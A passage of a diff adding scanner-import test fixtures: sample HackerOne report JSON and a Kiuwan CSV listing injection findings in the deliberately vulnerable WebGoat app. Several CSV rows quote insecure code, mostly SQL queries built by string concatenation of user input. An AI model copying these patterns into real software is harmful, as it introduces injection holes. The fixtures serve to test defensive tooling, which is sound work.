"eligible_for_bounty": true, + "eligible_for_submission": true, + "reference": "H001001" + } + } + }, + "bounties": { + "data": [ + + ] + }, + "custom_field_values": { + "data": [ + + ] + } + } + }, + { + "id": "1338", + "type": "report", + "attributes": { + "title": "CSRF in admin panel", + "state": "triaged", + "created_at": "2016-02-02T04:05:06.000Z", + "vulnerability_information": "...", + "triaged_at": "2016-02-03T03:01:36.000Z", + "closed_at": null, + "last_reporter_activity_at": null, + "first_program_activity_at": null, + "last_program_activity_at": null, + "bounty_awarded_at": null, + "swag_awarded_at": null, + "disclosed_at": null, + "issue_tracker_reference_id": "T554", + "issue_tracker_reference_url": "https://phabricator.tld/T554", + "cve_ids": [], + "source": null, + "reporter_agreed_on_going_public_at": null + }, + "relationships": { + "reporter": { + "data": { + "id": "1337", + "type": "user", + "attributes": { + "username": "api-example", + "name": "API Example", + "disabled": false, + "created_at": "2016-02-02T04:05:06.000Z", + "profile_picture": { + "62x62": "/assets/avatars/default.png", + "82x82": "/assets/avatars/default.png", + "110x110": "/assets/avatars/default.png", + "260x260": "/assets/avatars/default.png" + } + } + } + }, + "assignee": { + "data": { + "id": "1337", + "type": "group", + "attributes": { + "name": "Admin", + "created_at": "2016-02-02T04:05:06.000Z", + "permissions": [ + "user_management", + "report_management" + ] + } + } + }, + "program": { + "data": { + "id": "1337", + "type": "program", + "attributes": { + "handle": "security", + "created_at": "2016-02-02T04:05:06.000Z", + "updated_at": "2016-02-02T04:05:06.000Z" + } + } + }, + "severity": { + "data": { + "id": "64", + "type": "severity", + "attributes": { + "rating": "medium", + "author_type": "User", + "user_id": 1337, + "created_at": "2016-02-02T04:05:06.000Z", + "score": 6.3, + "attack_complexity": "low", + "attack_vector": "adjacent", + "availability": "medium", + "confidentiality": "low", + "integrity": "medium", + "privileges_required": "low", + "user_interaction": "required", + "scope": "changed" + } + } + }, + "weakness": { + "data": { + "id": "1337", + "type": "weakness", + "attributes": { + "name": "Cross-Site Request Forgery (CSRF)", + "description": "The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.", + "external_id": "cwe-352", + "created_at": "2016-02-02T04:05:06.000Z" + } + } + }, + "structured_scope": { + "data": { + "id": "64", + "type": "structured-scope", + "attributes": { + "asset_identifier": "example.com", + "asset_type": "url", + "confidentiality_requirement": "medium", + "integrity_requirement": "low", + "availability_requirement": "high", + "max_severity": "critical", + "created_at": "2015-03-04T04:05:06.000Z", + "updated_at": "2017-06-04T04:05:06.000Z", + "instruction": null, + "eligible_for_bounty": true, + "eligible_for_submission": true, + "reference": "T12345" + } + } + }, + "bounties": { + "data": [ + + ] + }, + "custom_field_values": { + "data": [ + + ] + } + } + } + ], + "links": { + "self": "https://api.hackerone.com/v1/reports?filter%5Bprogram%5D%5B%5D=security&page%5Bnumber%5D=1", + "next": "https://api.hackerone.com/v1/reports?filter%5Bprogram%5D%5B%5D=security&page%5Bnumber%5D=2", + "last": "https://api.hackerone.com/v1/reports?filter%5Bprogram%5D%5B%5D=security&page%5Bnumber%5D=5" + } + } \ No newline at end of file diff --git a/unittests/scans/h1/data_one.json b/unittests/scans/h1/data_one.json new file mode 100644 index 00000000000..a5e92205b38 --- /dev/null +++ b/unittests/scans/h1/data_one.json @@ -0,0 +1,143 @@ +{ + "data": [ + { + "id": "1337", + "type": "report", + "attributes": { + "title": "XSS in login form", + "state": "new", + "created_at": "2016-02-02T04:05:06.000Z", + "vulnerability_information": "...", + "triaged_at": null, + "closed_at": null, + "last_reporter_activity_at": null, + "first_program_activity_at": null, + "last_program_activity_at": null, + "bounty_awarded_at": null, + "last_activity_at": null, + "last_public_activity_at": null, + "swag_awarded_at": null, + "disclosed_at": null, + "source": null, + "reporter_agreed_on_going_public_at": null + }, + "relationships": { + "reporter": { + "data": { + "id": "1337", + "type": "user", + "attributes": { + "username": "api-example", + "name": "API Example", + "disabled": false, + "created_at": "2016-02-02T04:05:06.000Z", + "profile_picture": { + "62x62": "/assets/avatars/default.png", + "82x82": "/assets/avatars/default.png", + "110x110": "/assets/avatars/default.png", + "260x260": "/assets/avatars/default.png" + } + } + } + }, + "assignee": { + "data": { + "id": "1337", + "type": "user", + "attributes": { + "username": "member", + "name": "Member", + "disabled": false, + "created_at": "2016-02-02T04:05:06.000Z", + "profile_picture": { + "62x62": "/assets/avatars/default.png", + "82x82": "/assets/avatars/default.png", + "110x110": "/assets/avatars/default.png", + "260x260": "/assets/avatars/default.png" + } + } + } + }, + "program": { + "data": { + "id": "1337", + "type": "program", + "attributes": { + "handle": "security", + "created_at": "2016-02-02T04:05:06.000Z", + "updated_at": "2016-02-02T04:05:06.000Z" + } + } + }, + "severity": { + "data": { + "id": "57", + "type": "severity", + "attributes": { + "rating": "high", + "author_type": "User", + "user_id": 1337, + "created_at": "2016-02-02T04:05:06.000Z", + "score": 8.7, + "attack_complexity": "low", + "attack_vector": "adjacent", + "availability": "high", + "confidentiality": "low", + "integrity": "high", + "privileges_required": "low", + "user_interaction": "required", + "scope": "changed" + } + } + }, + "weakness": { + "data": { + "id": "1337", + "type": "weakness", + "attributes": { + "name": "Cross-Site Request Forgery (CSRF)", + "description": "The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.", + "external_id": "cwe-352", + "created_at": "2016-02-02T04:05:06.000Z" + } + } + }, + "structured_scope": { + "data": { + "id": "57", + "type": "structured-scope", + "attributes": { + "asset_identifier": "api.example.com", + "asset_type": "url", + "confidentiality_requirement": "high", + "integrity_requirement": "high", + "availability_requirement": "high", + "max_severity": "critical", + "created_at": "2015-02-02T04:05:06.000Z", + "updated_at": "2016-05-02T04:05:06.000Z", + "instruction": null, + "eligible_for_bounty": true, + "eligible_for_submission": true, + "reference": "H001001" + } + } + }, + "bounties": { + "data": [ + + ] + }, + "custom_field_values": { + "data": [ + + ] + } + } + } + ], + "links": { + "self": "https://api.hackerone.com/v1/reports?filter%5Bprogram%5D%5B%5D=security&page%5Bnumber%5D=1", + "next": "https://api.hackerone.com/v1/reports?filter%5Bprogram%5D%5B%5D=security&page%5Bnumber%5D=2", + "last": "https://api.hackerone.com/v1/reports?filter%5Bprogram%5D%5B%5D=security&page%5Bnumber%5D=5" + } + } \ No newline at end of file diff --git a/unittests/scans/intsights/intsights_zero_vul.json b/unittests/scans/intsights/intsights_zero_vul.json new file mode 100644 index 00000000000..da0b981bbae --- /dev/null +++ b/unittests/scans/intsights/intsights_zero_vul.json @@ -0,0 +1 @@ +{"Alerts": []} \ No newline at end of file diff --git a/unittests/scans/kiuwan_sample/kiuwan_many_vuln.csv b/unittests/scans/kiuwan_sample/kiuwan_many_vuln.csv new file mode 100644 index 00000000000..592f1e0f038 --- /dev/null +++ b/unittests/scans/kiuwan_sample/kiuwan_many_vuln.csv @@ -0,0 +1,215 @@ +Rule code,Rule,Priority,CWE,Software characteristic,Vulnerability type,Language,Effort,File,Line number,Line text,Source file,Source line number,Source line text,Muted,Normative,Status,CWE Scope,Framework +OPT.JAVA.SEC_JAVA.XPathInjectionRule,Improper Neutralization of Data within XPath Expressions ('XPath Injection'),Very High,643,Security,Injection,Java,30m,xpath-injection/src/main/java/org/owasp/webgoat/plugin/XPATHInjection.java,144,"nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);",xpath-injection/src/main/java/org/owasp/webgoat/plugin/XPATHInjection.java,130,"password = s.getParser().getRawParameter(PASSWORD, """")",No,"CERT-J:IDS53-J,CWE:643,OWASP:2013:A1,OWASP:2013:A5,PCI-DSS:6.5.1,WASC:39",none,"CWEScope:Access-Control,CWEScope:Confidentiality", +OPT.JAVA.SEC_JAVA.XmlEntityInjectionRule,XML entity injection,Very High,611,Security,Injection,Java,30m,ws-sax-injection/src/main/java/org/owasp/webgoat/plugin/WsSAXInjection.java,164,reader.parse(new InputSource(new StringReader(xml)));,ws-sax-injection/src/main/java/org/owasp/webgoat/plugin/WsSAXInjection.java,157,String xml,No,"CERT-J:IDS16-J,CERT-J:IDS17-J,CWE:611,CWE:776,OWASP:2013:A1,OWASP:2013:A5,OWASP:2017:A4,PCI-DSS:6.5.1,WASC:43,WASC:44",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.UnsafeReflection,Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection'),Very High,470,Security,Injection,Java,30m,blind-script/src/main/java/org/owasp/webgoat/plugin/BlindScript.java,280," Method meth = cls.getMethod(method, parameterType);",blind-script/src/main/java/org/owasp/webgoat/plugin/BlindScript.java,125,"method = s.getParser().getStringParameter(METHOD, """")",No,"CERT-J:SEC05-J,CWE:470,OWASP:2013:A4,PCI-DSS:6.5.8,WASC:20",none,"CWEScope:Availability,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,blind-numeric-sql-injection/src/main/java/org/owasp/webgoat/plugin/BlindNumericSqlInjection.java,112,results = statement.executeQuery(query),blind-numeric-sql-injection/src/main/java/org/owasp/webgoat/plugin/BlindNumericSqlInjection.java,78,"accountNumber = s.getParser().getRawParameter(ACCT_NUM, ""101"")",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,blind-string-sql-injection/src/main/java/org/owasp/webgoat/plugin/BlindStringSqlInjection.java,112,results = statement.executeQuery(query),blind-string-sql-injection/src/main/java/org/owasp/webgoat/plugin/BlindStringSqlInjection.java,78,"accountNumber = s.getParser().getRawParameter(ACCT_NUM, ""101"")",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/crosssitescripting/UpdateProfileCrossSiteScripting.java,280,ps = WebSession.getConnection(s).prepareStatement(query),webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/crosssitescripting/UpdateProfileCrossSiteScripting.java,322,ps = WebSession.getConnection(s).prepareStatement(query),webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,db-cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/db_cross_site/UpdateProfileDBCrossSiteScripting.java,178,ps = WebSession.getConnection(s).prepareStatement(query),webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,dos-login/src/main/java/org/owasp/webgoat/plugin/DOS_Login.java,108,results = statement.executeQuery(query),dos-login/src/main/java/org/owasp/webgoat/plugin/DOS_Login.java,88,password = s.getParser().getRawParameter(PASSWORD);,No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,dos-login/src/main/java/org/owasp/webgoat/plugin/DOS_Login.java,124,statement.executeUpdate(insertData1);,dos-login/src/main/java/org/owasp/webgoat/plugin/DOS_Login.java,123,"insertData1 = ""INSERT INTO user_login VALUES ( '"" + username + ""', '"" + + s.getUserName() + ""' )""",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,dos-login/src/main/java/org/owasp/webgoat/plugin/DOS_Login.java,128,results = statement.executeQuery(query);,dos-login/src/main/java/org/owasp/webgoat/plugin/DOS_Login.java,127,"query = ""SELECT * FROM user_login WHERE webgoat_user = '"" + s.getUserName() + ""'"";",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,dos-login/src/main/java/org/owasp/webgoat/plugin/DOS_Login.java,136,statement.executeUpdate(deleteData1);,dos-login/src/main/java/org/owasp/webgoat/plugin/DOS_Login.java,134,"deleteData1 = ""DELETE from user_login WHERE webgoat_user = '"" + s.getUserName() + + ""'""",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,dos-login/src/main/java/org/owasp/webgoat/plugin/DOS_Login.java,148,results = statement.executeQuery(query);,dos-login/src/main/java/org/owasp/webgoat/plugin/DOS_Login.java,147,"query = ""SELECT * FROM user_login WHERE webgoat_user = '"" + s.getUserName() + ""'"";",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,199,answer_results = answer_statement.executeQuery(query),goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,133, String ss = (String) s.getRequest().getSession().getAttribute(name);,No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,253, ResultSet answer_results = answer_statement.executeQuery(query);,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,133, String ss = (String) s.getRequest().getSession().getAttribute(name);,No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/ListStaff.java,87, ResultSet answer_results = answer_statement.executeQuery(query);,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,133, String ss = (String) s.getRequest().getSession().getAttribute(name);,No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/Login.java,127, ResultSet answer_results = answer_statement.executeQuery(query);,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/Login.java,67,password = s.getParser().getStringParameter(GoatHillsFinancial.PASSWORD),No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/UpdateProfile.java,183,ps = WebSession.getConnection(s).prepareStatement(query),webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,148,image_results = image_statement.executeQuery(image_query),malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,144,"image_query = ""SELECT image_relative_url FROM mfe_images WHERE user_name = '"" + + s.getUserName() + ""'""",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,295,statement.executeUpdate(deleteuserrow);,malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,293,"deleteuserrow = ""DELETE from mfe_images WHERE user_name = '"" + + s.getUserName() + ""';""",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,456,"if(statement.executeUpdate(updateData1) == 0) { + // update failed, we need to add a row + String insertData1 = ""INSERT INTO mfe_images VALUES ('"" + + s.getUserName() + ""','"" + UPLOADS_RELATIVE_PATH + ""/"" + + item.getName() + ""')""; +(...)",malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,452,"updateData1 = ""UPDATE mfe_images SET image_relative_url='"" + UPLOADS_RELATIVE_PATH + ""/"" + + item.getName() + ""' WHERE user_name = '"" + + s.getUserName() + ""';""",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,464,statement.executeUpdate(insertData1);,malicious-file-execution/src/main/java/org/owasp/webgoat/plugin/MaliciousFileExecution.java,460,"insertData1 = ""INSERT INTO mfe_images VALUES ('"" + + s.getUserName() + ""','"" + UPLOADS_RELATIVE_PATH + ""/"" + + item.getName() + ""')""",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,role-based-access-control/src/main/java/instructor/UpdateProfile_i.java,100, PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,133, String ss = (String) s.getRequest().getSession().getAttribute(name);,No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,role-based-access-control/src/main/java/instructor/UpdateProfile_i.java,100,ps = WebSession.getConnection(s).prepareStatement(query),webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,role-based-access-control/src/main/java/instructor/ViewProfile_i.java,89, ResultSet answer_results = answer_statement.executeQuery(query);,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,133, String ss = (String) s.getRequest().getSession().getAttribute(name);,No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,role-based-access-control/src/main/java/org/owasp/webgoat/plugin/rollbased/RoleBasedAccessControl.java,399,"if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName) + && !isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION)) + { + setStageComplete(s, STAGE2); + }",role-based-access-control/src/main/java/org/owasp/webgoat/plugin/rollbased/RoleBasedAccessControl.java,333,"requestedActionName = s.getParser().getStringParameter(""action"");",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,role-based-access-control/src/main/java/org/owasp/webgoat/plugin/rollbased/UpdateProfileRoleBasedAccessControl.java,219,ps = WebSession.getConnection(s).prepareStatement(query),webgoat-container/src/main/java/org/owasp/webgoat/session/DatabaseUtilities.java,63," return getConnection(s.getUserName(), s.getWebgoatContext());",No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,sql-injection/src/main/java/org/owasp/webgoat/plugin/sqlinjection/ListStaffSqlInjection.java,90, ResultSet answer_results = answer_statement.executeQuery(query);,goat-hills-financial/src/main/java/org/owasp/webgoat/plugin/GoatHillsFinancial/DefaultLessonAction.java,133, String ss = (String) s.getRequest().getSession().getAttribute(name);,No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,sql-injection/src/main/java/org/owasp/webgoat/plugin/sqlinjection/LoginSqlInjection.java,132, ResultSet answer_results = answer_statement.executeQuery(query);,sql-injection/src/main/java/org/owasp/webgoat/plugin/sqlinjection/LoginSqlInjection.java,71,password = s.getParser().getRawParameter(SQLInjection.PASSWORD),No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very High,564,Security,Injection,Java,30m,sql-injection/src/main/java/org/owasp/webgoat/plugin/sqlinjection/LoginSqlInjection.java,167, ResultSet answer_results = answer_statement.executeQuery(query);,sql-injection/src/main/java/org/owasp/webgoat/plugin/sqlinjection/LoginSqlInjection.java,236,password = s.getParser().getRawParameter(SQLInjection.PASSWORD),No,"CERT-J:IDS00-J,CWE:564,CWE:89,OWASP:2013:A1,OWASP:2013:A5,OWASP:2013:A6,OWASP:2017:A1,PCI-DSS:6.5.1,SANS25:2010:2,SANS25:2011:1,WASC:19",none,"CWEScope:Access-Control,CWEScope:Confidentiality,CWEScope:Integrity", +OPT.JAVA.SEC_JAVA.SqlInjectionRule,Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'),Very 